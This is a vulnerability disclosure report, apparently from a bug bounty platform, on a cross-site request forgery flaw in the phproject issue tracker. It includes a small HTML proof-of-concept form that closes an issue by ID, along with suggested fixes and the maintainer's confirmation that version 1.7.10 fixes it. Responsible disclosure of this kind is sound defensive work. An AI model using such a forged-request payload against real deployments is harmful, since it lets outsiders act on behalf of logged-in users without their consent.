Cross-Site Request Forgery (CSRF) in alanaktion/phproject

Valid

Reported on

Aug 2nd 2021


✍️ Description

Attacker able to close any issue with CSRF attack.

It does not matter at all that your application run in localhost or elsewhere, just it is enough to run on a browser and another low privilege user or attackers know the IP address or hostname of your application.

In CSRF attacks it is necessary that a user logged into your application just going to a malicious website and after that only with a redirection attacker can close a issue, this means only with visiting a site a issue will be closed.

🕵️‍♂️ Proof of Concept

// PoC.html

<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost:8000/phproject/issues/close/1">
<input type="submit" value="Submit request" />
</form>
</body>
</html>

Here a issues with id equal to 1 will be closed after clicking on submit button on PoC.html file.

Also for real attacks the submit button can be auto-submit.

💥 Impact

This vulnerability is capable of close any issue.

Fix

set a token with a length bigger that 16 characters then attacker never can guess the url. Also you cat turn Lax to Strict in cookies. 📍 Location index.php#L1

Occurrences

We have contacted a member of the alanaktion/phproject team and are waiting to hear back a year ago
amammad modified the report
a year ago
Alan Hardman validated this vulnerability a year ago
amammad has been awarded the disclosure bounty
The fix bounty is now up for grabs
Alan Hardman
a year ago

Maintainer


Fixed in the published 1.7.10 update, details in GHSA-3xfh-h685-w25m.

Alan Hardman marked this as fixed with commit 4032f4 a year ago
Alan Hardman has been awarded the fix bounty
This vulnerability will not receive a CVE
to join this conversation